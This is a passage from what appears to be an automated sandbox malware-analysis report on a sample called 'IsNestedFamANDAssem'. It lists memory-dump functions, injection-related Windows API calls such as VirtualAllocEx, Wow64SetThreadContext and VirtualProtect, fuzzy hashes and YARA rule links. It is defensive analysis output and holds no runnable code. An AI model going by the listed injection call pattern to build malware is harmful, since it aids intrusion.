                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 101c89bafb13886d43ee6354f0aa11f94acaebcca202ceda1d6fce2ddcaa0c0f
                                                          • Instruction ID: fe772e670eebcc1a7e247ee2bd0c3c186921338dd9280a0250ee4d6520ea585f
                                                          • Opcode Fuzzy Hash: 101c89bafb13886d43ee6354f0aa11f94acaebcca202ceda1d6fce2ddcaa0c0f
                                                          • Instruction Fuzzy Hash: C6217CB1D103089FCB10DFAAC485BEEBBF4EF48314F10842AD519A7241CB789A44CFA5
                                                          Function 06E92588 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06E92606
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386173730.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6e90000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: ce8c2e0ff5e86b2dc11a4da28cd8e51228aaa09296bcd71b937ea19570868d86
                                                          • Instruction ID: d7aa31b7dea9016751bd5108939ebead21626ba31d768541b2feb959fd938a19
                                                          • Opcode Fuzzy Hash: ce8c2e0ff5e86b2dc11a4da28cd8e51228aaa09296bcd71b937ea19570868d86
                                                          • Instruction Fuzzy Hash: 442149B1D103099FDB10DFAAC485BEEBBF4EF48314F108429D519A7241CB78AA44CFA5
                                                          Function 06EAD780 Relevance: 1.6, APIs: 1, Instructions: 62memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06EAD7FC
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386216821.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6ea0000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: f54e784c6cddf024dc0a1df0cc7ec5cb8fb9500e356976bc835a5ca3039f6b8d
                                                          • Instruction ID: e6250f94f4043f506ac9131f0d41ffbdd28553333ab670cc8187b1dd833bec20
                                                          • Opcode Fuzzy Hash: f54e784c6cddf024dc0a1df0cc7ec5cb8fb9500e356976bc835a5ca3039f6b8d
                                                          • Instruction Fuzzy Hash: E22139758003499FDB10DFAAC881AEEFBF5EF48320F108429D429A7240DB389545CFA1
                                                          Function 06C70301 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 06C7037C
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385136098.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6c70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 5a1f109fbf87a93365dfa6cb9a14231f5bb2c6aa4badad5c404161c10bb8dcc9
                                                          • Instruction ID: c82a8354cec6ea47f3e0e1b05192d524fee7b6d5c3cb196505b311f9de9805e0
                                                          • Opcode Fuzzy Hash: 5a1f109fbf87a93365dfa6cb9a14231f5bb2c6aa4badad5c404161c10bb8dcc9
                                                          • Instruction Fuzzy Hash: 302115B1D002489FCB20DFAAC884AEEFBF5FF48314F20842AD459A7250C7799945CFA1
                                                          Function 06EAD788 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06EAD7FC
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386216821.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6ea0000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 0c26c1cb48daef680719d473cd00c107c69979ac85e8488ff631cccbf8a476c3
                                                          • Instruction ID: 10bb2c109629f10d809b27ba2e76086c29f06d26bcb3169452002f41b26fe9fb
                                                          • Opcode Fuzzy Hash: 0c26c1cb48daef680719d473cd00c107c69979ac85e8488ff631cccbf8a476c3
                                                          • Instruction Fuzzy Hash: 842104B18003498EDB10DFAAC845AAEBBF5EF48324F508429D419A7240CB78A945CBA1
                                                          Function 06EAC6F1 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386216821.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6ea0000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: d3d62acc9173d27367c7638e2f8f196845e6d2409b4baedb1b2a574946e919b5
                                                          • Instruction ID: 62fe2eac73f777d9244dec0db44c1fc94c522f561f311aa1c394e47e3e129071
                                                          • Opcode Fuzzy Hash: d3d62acc9173d27367c7638e2f8f196845e6d2409b4baedb1b2a574946e919b5
                                                          • Instruction Fuzzy Hash: 0B116D719003598ACB10DFAAC845BEEFFF8EF48724F24841AD415A7280DB38A944CBA5
                                                          Function 06E92B8A Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E92BFE
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386173730.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6e90000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: c645e22cc5c2c2d46cc7fd901134f78ba93cb6edcd6d380564ce03b4a739485b
                                                          • Instruction ID: d07a845fcbebe1995f0e185c2fbee85eb9fed42d2634520533de6f414eb86e43
                                                          • Opcode Fuzzy Hash: c645e22cc5c2c2d46cc7fd901134f78ba93cb6edcd6d380564ce03b4a739485b
                                                          • Instruction Fuzzy Hash: 04114775800249DFCF10DFAAC845AEEFBF5EF48314F108419E519A7250C7759540CBA5
                                                          Function 06C70308 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 06C7037C
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385136098.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6c70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 67046f29498d5cc514770fa5ee055a89a446a2acf842fb2c073d18a97c5e70c3
                                                          • Instruction ID: 35df6fee3a49810fb245127b340cf3999f5788c67d3d882c8d8408ba29d2b505
                                                          • Opcode Fuzzy Hash: 67046f29498d5cc514770fa5ee055a89a446a2acf842fb2c073d18a97c5e70c3
                                                          • Instruction Fuzzy Hash: 441106B1D002499FCB10DFAAC884AEEFBF5FF48314F10842AD419A7250C779A944CFA1
                                                          Function 06EAC6F8 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386216821.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6ea0000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 0474f38c1e1da631e1f1c4d6dcc2d18b6a0518f7d6920efdc43630eb065e01f8
                                                          • Instruction ID: dd41bb55ed32224f8256be59eeca6c45b4ab3e8ce37853a73d875a40a5b87cd4
                                                          • Opcode Fuzzy Hash: 0474f38c1e1da631e1f1c4d6dcc2d18b6a0518f7d6920efdc43630eb065e01f8
                                                          • Instruction Fuzzy Hash: 7C1137B19003498ADB10DFAAC845BEEFBF9AF49714F24841AD459A7240CB38A944CBA4
                                                          Function 06E92B90 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E92BFE
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386173730.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6e90000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 01bca5955c317202dd4e298b6f134bb149d9ba014699b88601b08b927fee5580
                                                          • Instruction ID: bd2790399ea4bd5f383174bfa9de386dffe29eb5a0b83dc27ff9c53e3345f3df
                                                          • Opcode Fuzzy Hash: 01bca5955c317202dd4e298b6f134bb149d9ba014699b88601b08b927fee5580
                                                          • Instruction Fuzzy Hash: 741137719002499FCF10DFAAC845AEEBFF5EF48314F208419E519A7250C779A944CFA1
                                                          Function 016642B3 Relevance: 1.5, Strings: 1, Instructions: 240COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH]q
                                                          • API String ID: 0-3168235125
                                                          • Opcode ID: 3f8fa22ea0578ec4f427c2228a107a1a330d9b3ff059bcecece58fd0ae06831f
                                                          • Instruction ID: 19892c8a8fb7181786d3a29c29f9922e4fa08af8fdbe5e9394b13a8231217a44
                                                          • Opcode Fuzzy Hash: 3f8fa22ea0578ec4f427c2228a107a1a330d9b3ff059bcecece58fd0ae06831f
                                                          • Instruction Fuzzy Hash: 22C19E74906269CFEB64DF25CD88BADBBB5BB48301F0091EAD44AA3245DB745EC5CF80
                                                          Function 060996C4 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %
                                                          • API String ID: 0-2567322570
                                                          • Opcode ID: 72a6dedd0600206992bc069fad34298d7374e9e26f9c8deeaa27443c6751029d
                                                          • Instruction ID: cee821a4173d95d39accfca2c022159cd915495447ba9018c4c396b1e87289b7
                                                          • Opcode Fuzzy Hash: 72a6dedd0600206992bc069fad34298d7374e9e26f9c8deeaa27443c6751029d
                                                          • Instruction Fuzzy Hash: 7041BD74A402588FEBA4DF68C884BD9BBB2FB49304F1484A9D509B7240DB395EC98F60
                                                          Function 06099DB2 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ?
                                                          • API String ID: 0-1684325040
                                                          • Opcode ID: 2636db4baf2350db725900b3eeb5dabb5d4d069fd62214d64f1ea60f88b57a13
                                                          • Instruction ID: 5a3c393fc562200137026292d73d1699e038f38d2be5a082620783ddc84b8409
                                                          • Opcode Fuzzy Hash: 2636db4baf2350db725900b3eeb5dabb5d4d069fd62214d64f1ea60f88b57a13
                                                          • Instruction Fuzzy Hash: 1D419074945268CFDBA0CF64C884B9DBBB2BB49304F5484EAD509B7240DB395EC99F50
                                                          Function 06099FF2 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: /
                                                          • API String ID: 0-2043925204
                                                          • Opcode ID: 9fd8872440cc2a46933e7bdf3ba7fcd7c2bc9491797db77cc293645cf6e988fc
                                                          • Instruction ID: e52785e602a0c974266d1b46cb0a0b2a1c97d1feec5a64336f41f245d64082e8
                                                          • Opcode Fuzzy Hash: 9fd8872440cc2a46933e7bdf3ba7fcd7c2bc9491797db77cc293645cf6e988fc
                                                          • Instruction Fuzzy Hash: 3941AE74A412588FDBA4DF58C884B99BBF2BB4A304F1484EAD50DB7250CB395EC9CF11
                                                          Function 06C91E8D Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385221527.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6c90000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q
                                                          • API String ID: 0-1259897404
                                                          • Opcode ID: b470b858083d7089bcc8de4a2e3b860666015a6ccbb4c451364420b68e0eabf1
                                                          • Instruction ID: 360f74115e3a404782fab649337a214215ef7f2c19c68035165d3b557bd33f05
                                                          • Opcode Fuzzy Hash: b470b858083d7089bcc8de4a2e3b860666015a6ccbb4c451364420b68e0eabf1
                                                          • Instruction Fuzzy Hash: 55318974D0420ADFDF59CFAAD4086EEBBB1EF85311F1480AED491A7691C7380A81CFA0
                                                          Function 06C712E8 Relevance: 1.3, APIs: 1, Instructions: 57memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 06C7135B
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385136098.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6c70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 6111b758e6916d3047bbe1ef206a0320dd466dc81ecad236bf0ad45d4a320c2a
                                                          • Instruction ID: 9b11574d888aa139ccf6b847d9acafa41e0f3ba5cbbb78e13ee1f9f27c043a00
                                                          • Opcode Fuzzy Hash: 6111b758e6916d3047bbe1ef206a0320dd466dc81ecad236bf0ad45d4a320c2a
                                                          • Instruction Fuzzy Hash: 61115971800248CFCB20DFAAC844AEEFBF5EF48314F248419D969A7650C7359984CBA0
                                                          Function 06C712F0 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 06C7135B
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385136098.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6c70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 9300222ef97b783b22e9428c83441e85d2156bd8cc0702c5a1fa02f16094e5c7
                                                          • Instruction ID: 24234ecdc2273a2f7bcaf92056c3741d80b061927ca87e2f2aaa592664f0d01d
                                                          • Opcode Fuzzy Hash: 9300222ef97b783b22e9428c83441e85d2156bd8cc0702c5a1fa02f16094e5c7
                                                          • Instruction Fuzzy Hash: FA1137759002488FCB10DFAAC844AEEFBF5EF48314F248419D519A7650C779A540CBA0
                                                          Function 07163BF9 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386674114.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7160000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: "
                                                          • API String ID: 0-123907689
                                                          • Opcode ID: 172f3b7dc674bfafdab696c3a9f8295da05960cf80bbbd76a03256d2b29bd7ba
                                                          • Instruction ID: a2d38d233619fdadcdde3a4a9cfcdf3db203a304bb7c6358aeb11ff5322df66f
                                                          • Opcode Fuzzy Hash: 172f3b7dc674bfafdab696c3a9f8295da05960cf80bbbd76a03256d2b29bd7ba
                                                          • Instruction Fuzzy Hash: 7E11E8B8A412198FEB54DF28C884ACDB7F1FB4D704F0044E9D94DA3345DA349E848F05
                                                          Function 01664F16 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 9
                                                          • API String ID: 0-2366072709
                                                          • Opcode ID: fdd04a2688d1986f473420e78ca9ef74cb3c19cfe81e9180ac46a651063cc99c
                                                          • Instruction ID: f2af436ea18794fbbf7e42066aae9536800406411d5b4ec6f24b6727d92b8750
                                                          • Opcode Fuzzy Hash: fdd04a2688d1986f473420e78ca9ef74cb3c19cfe81e9180ac46a651063cc99c
                                                          • Instruction Fuzzy Hash: 580176749002688FEB61DF64DD48BDCBBB9BB49305F1045EADA0DB2294DB715AC6CF00
                                                          Function 06D72604 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385789098.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6d70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: l
                                                          • API String ID: 0-2517025534
                                                          • Opcode ID: 77aa203f17067b50a979534d7031bea8f52dc3f4d4af5618ddc77b92d9c23b99
                                                          • Instruction ID: 9ede53d008a2fa6c241d097902d13435ea8b4cf41c5873b7113c6edc955b7b07
                                                          • Opcode Fuzzy Hash: 77aa203f17067b50a979534d7031bea8f52dc3f4d4af5618ddc77b92d9c23b99
                                                          • Instruction Fuzzy Hash: 6C0162B081122CCFDBA6DF54E884B9CB6F9BB08304F40559AE949A2280D7B55B84CF46
                                                          Function 060991CA Relevance: 1.3, Strings: 1, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: +
                                                          • API String ID: 0-2126386893
                                                          • Opcode ID: a0786b5cfd9f817c44a8b1523df986c93cb838a7cef1cc2884b0af11bdc17846
                                                          • Instruction ID: 01957e0f2fee29da08ab81e40c8209024e758c7e1f177c15290cba2dedc1e2e0
                                                          • Opcode Fuzzy Hash: a0786b5cfd9f817c44a8b1523df986c93cb838a7cef1cc2884b0af11bdc17846
                                                          • Instruction Fuzzy Hash: AFF0D438900118CFDB14DF24C948B9DBBB1FF89304F1881A9C80967351DB759E86CF01
                                                          Function 06D7A550 Relevance: 1.3, Strings: 1, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385789098.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6d70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 9
                                                          • API String ID: 0-2366072709
                                                          • Opcode ID: 59d4be4c4bebece8e835b18077208f72a6cd733062dac1db6bb97866e77b057d
                                                          • Instruction ID: 37bc8d481e6e62da41391b3fc843d8499c48e33b235fe88f85f71e968f41425d
                                                          • Opcode Fuzzy Hash: 59d4be4c4bebece8e835b18077208f72a6cd733062dac1db6bb97866e77b057d
                                                          • Instruction Fuzzy Hash: FDE012345053598FD7958F20DC94FAD777CEB01600F0415D2D44957155DA785F89CF12
                                                          Function 06D7A52D Relevance: 1.3, Strings: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385789098.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6d70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 9
                                                          • API String ID: 0-2366072709
                                                          • Opcode ID: 50f8f26b510b36a411658ddf77e8c290fe7c1bae986d263a09ebd4811412e35d
                                                          • Instruction ID: 2d1179083a15ec0e20704580a694675bb1339a5d10dfb4c7927376f67d7b4550
                                                          • Opcode Fuzzy Hash: 50f8f26b510b36a411658ddf77e8c290fe7c1bae986d263a09ebd4811412e35d
                                                          • Instruction Fuzzy Hash: 25D092349013298FEBA5CF24DC94FA9B77CEB00701F0455A5D44967258EB749F89CF51
                                                          Function 06D75AB0 Relevance: .2, Instructions: 194COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385789098.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6d70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7d46061bde540bc7caa65939dcde0d091c09e5318f61400454bcf59382bf8853
                                                          • Instruction ID: 9dd3c2e76ece19321f34f8ac8f0e4f42709021e85f00a2f802109638225176da
                                                          • Opcode Fuzzy Hash: 7d46061bde540bc7caa65939dcde0d091c09e5318f61400454bcf59382bf8853
                                                          • Instruction Fuzzy Hash: ED81D674D0521CCFDB94DFA9E484BEDBBB1FB48304F108529D4056B294EB74A945CF92
                                                          Function 01660870 Relevance: .2, Instructions: 180COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f74144a87d2620403cb49e3724ae2bffb149ae42b90e5f6a60af519f9688c9a3
                                                          • Instruction ID: cf56c2cc8bd2598cc6c864983ced3a4add439bde300131314de1f1d4a9ab4615
                                                          • Opcode Fuzzy Hash: f74144a87d2620403cb49e3724ae2bffb149ae42b90e5f6a60af519f9688c9a3
                                                          • Instruction Fuzzy Hash: BF511530305204DFD7159B78D854A2A7BAAFF82304F1185BAF046CB365DB75AC07CBA2
                                                          Function 06097618 Relevance: .2, Instructions: 167COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d7971702154a4385b227283d1e08a29a38f7aa9c5d548e39d5e54645387fc9b9
                                                          • Instruction ID: c02b26c9b878d24e52869ffd54ec16f6e9c94a5094a865b7c503daa8a7c38b42
                                                          • Opcode Fuzzy Hash: d7971702154a4385b227283d1e08a29a38f7aa9c5d548e39d5e54645387fc9b9
                                                          • Instruction Fuzzy Hash: A871F074E56208CFEB94CFA9D840BADBBF2FB89304F1490A9D409A7251D7385A84CF51
                                                          Function 0609D64A Relevance: .2, Instructions: 156COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c1b0d22e3d867bb8c3365d7d1d3ab9fe9a1abc509c71c370e12455b6600f5ab7
                                                          • Instruction ID: 046c80c0755a0ac7b8dfa47d590fbdc4f84bf3e44812aae78d55ddd14a3440a1
                                                          • Opcode Fuzzy Hash: c1b0d22e3d867bb8c3365d7d1d3ab9fe9a1abc509c71c370e12455b6600f5ab7
                                                          • Instruction Fuzzy Hash: A6513870D81608DFDB84DFA9D840A9DBBF2FF89310F148569E419B7640DB74A984DBA0
                                                          Function 0609FA98 Relevance: .2, Instructions: 152COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e021528561b9bcca96fc9cb718e5ac0174d21331f9491b6994db913f8f6f4749
                                                          • Instruction ID: ffb9289823e5ad77d5c1cc366e47ee2abd7ac945f7cda80ddddae93a5e52d288
                                                          • Opcode Fuzzy Hash: e021528561b9bcca96fc9cb718e5ac0174d21331f9491b6994db913f8f6f4749
                                                          • Instruction Fuzzy Hash: 0B51D5B4D4120ACFDB84CFA9C484AEEBBF6FB49300F20942AD515A7350EB795985DF90
                                                          Function 06097694 Relevance: .1, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2964206d4bbfdaf85967e9b02329492bfac3c7d6ea5655ec83426fb7da985fe2
                                                          • Instruction ID: 7fef5c5405fec085e146506ad03171c59ba7bbe797a61619fda478cfff04f672
                                                          • Opcode Fuzzy Hash: 2964206d4bbfdaf85967e9b02329492bfac3c7d6ea5655ec83426fb7da985fe2
                                                          • Instruction Fuzzy Hash: E851BE78E562088FEB94CF68D880BADBBF2FB89304F1494A9D419A7351D7385D84CF50
                                                          Function 06D75BE9 Relevance: .1, Instructions: 126COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385789098.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6d70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 428989b1cba3a6dc16ec74986ca40b4f72f23fb8afe8755997e638125f4b5a0a
                                                          • Instruction ID: 3c72eb69c79a255de333161d6737ce3d6032f253409cf188d03ac47877dd857f
                                                          • Opcode Fuzzy Hash: 428989b1cba3a6dc16ec74986ca40b4f72f23fb8afe8755997e638125f4b5a0a
